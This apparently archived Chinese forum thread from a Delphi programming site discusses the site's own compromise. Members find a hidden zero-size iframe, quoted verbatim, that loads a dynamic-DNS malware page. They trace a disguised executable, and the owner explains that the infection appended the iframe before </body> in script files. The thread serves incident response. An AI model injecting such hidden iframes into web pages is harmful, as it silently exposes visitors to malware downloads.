本站被入侵了嗎? |
|
qoo1234
版主 發表:256 回覆:1167 積分:659 註冊:2003-02-24 發送簡訊給我 |
|
pcplayer99
尊榮會員 發表:146 回覆:790 積分:632 註冊:2003-01-21 發送簡訊給我 |
查看页面 Source ,的确发现一个大小为 0 的 IFrame: <iframe src="http://fucktw.go.3322.org" width=0 height=0></iframe> 连接的这个 fucktw.go.3322.org ,是一个动态 IP 解析的 Domain name. 3322.org 是提供动态 IP 解析服务的。 fucktw.go.3322.org 这个 domain name 似乎没有被解析,可能是它的主人没有开自己的电脑。因为最近几天我 ping 它,得到的 IP 都和 www.3322.org 本身一致。 它把自己隐藏在一个大小为 0 的 IFrame 里,似乎是想让大家访问它却不被发现。不排除它在自己的页面内暗藏病毒或木马的可能。
|
builder78
初階會員 發表:36 回覆:100 積分:47 註冊:2003-02-03 發送簡訊給我 |
|
william
版主 發表:66 回覆:2535 積分:3048 註冊:2002-07-11 發送簡訊給我 |
小弟追蹤了一下, http://www.650411.net/default.htm 會回傳一個 script, decode 後如下:
<HTML> <BODY>bbs003302.gif 是另一個 script 而 bbs003302.css 則是一個 exe,從其 version info 得知原名為 HideDownFile.exe,Icon 則為 MFC 預設 icon。我想暫時還是用 Firefox 好了,不竟 ActiveX 還是比較危險 希望 face='Lucida Console'>http://pywong.hk.st |
P.D.
版主 發表:603 回覆:4038 積分:3874 註冊:2006-10-31 發送簡訊給我 |
引言: 小弟追蹤了一下, http://www.650411.net/default.htm 會回傳一個 script, decode 後如下:william版主有追蹤到, 不知道是否有解決之道, 因為已經好幾天了, 最近我實在不太敢上來, 怕萬一那天我的系統擋不住! 謝謝!<HTML> <BODY>bbs003302.gif 是另一個 script 而 bbs003302.css 則是一個 exe,從其 version info 得知原名為 HideDownFile.exe,Icon 則為 MFC 預設 icon。我想暫時還是用 Firefox 好了,不竟 ActiveX 還是比較危險 希望 face='Lucida Console'>http://pywong.hk.st |
william
版主 發表:66 回覆:2535 積分:3048 註冊:2002-07-11 發送簡訊給我 |
引言: william版主有追蹤到, 不知道是否有解決之道, 因為已經好幾天了, 最近我實在不太敢上來, 怕萬一那天我的系統擋不住! 謝謝!解決之道?我想應該先將該木馬從 KTop 清除吧,這個可能要勞煩天使大大了...小弟暫時還是用不支援 ActiveX 的 browser (Firefox) 上 KTop。話說回來,小弟一直用 IE 來瀏覽 KTop,好像沒甚麼異樣 小弟的配置: > < face='Lucida Console'>http://pywong.hk.st |
gyl
一般會員 發表:0 回覆:15 積分:13 註冊:2005-01-10 發送簡訊給我 |
|
rogan321
高階會員 發表:21 回覆:307 積分:200 註冊:2003-05-15 發送簡訊給我 |
|
enter2004
初階會員 發表:51 回覆:94 積分:34 註冊:2005-04-10 發送簡訊給我 |
|
Morris
一般會員 發表:1 回覆:5 積分:6 註冊:2002-03-13 發送簡訊給我 |
|
領航天使
站長 發表:12216 回覆:4186 積分:4084 註冊:2001-07-25 發送簡訊給我 |
很抱歉,因為站長出國一個星期,回國後才獲知這個消息!
對於造成各位網友的困擾,在此鄭重道歉!
這個病毒暫時清除!
他的手法是搜尋.HTM/.HTML/.ASP/.PHP等Script程式檔案
找到 < / body > 語法處 , 在前面加上
< i frame src="http://fucktw.go.3322.org" width=0 height=0> < / iframe>
讓本站網頁導入fucktw.go.3322.org這個病毒網頁中 目前本站採取了一些防範措施,希望能奏效,
猜測是利用IIS的漏洞進來的! 本站對此人的行為表示嚴厲的譴責,
並且已經保留相關證據,
保留日後的法律追究權利! 再次感謝各位熱心的協助! 站長敬上 ~~~Delphi K.Top討論區站長~~~
------
~~~Delphi K.Top討論區站長~~~ |
gyl
一般會員 發表:0 回覆:15 積分:13 註冊:2005-01-10 發送簡訊給我 |
本站聲明 |
1. 本論壇為無營利行為之開放平台,所有文章都是由網友自行張貼,如牽涉到法律糾紛一切與本站無關。 2. 假如網友發表之內容涉及侵權,而損及您的利益,請立即通知版主刪除。 3. 請勿批評中華民國元首及政府或批評各政黨,是藍是綠本站無權干涉,但這裡不是政治性論壇! |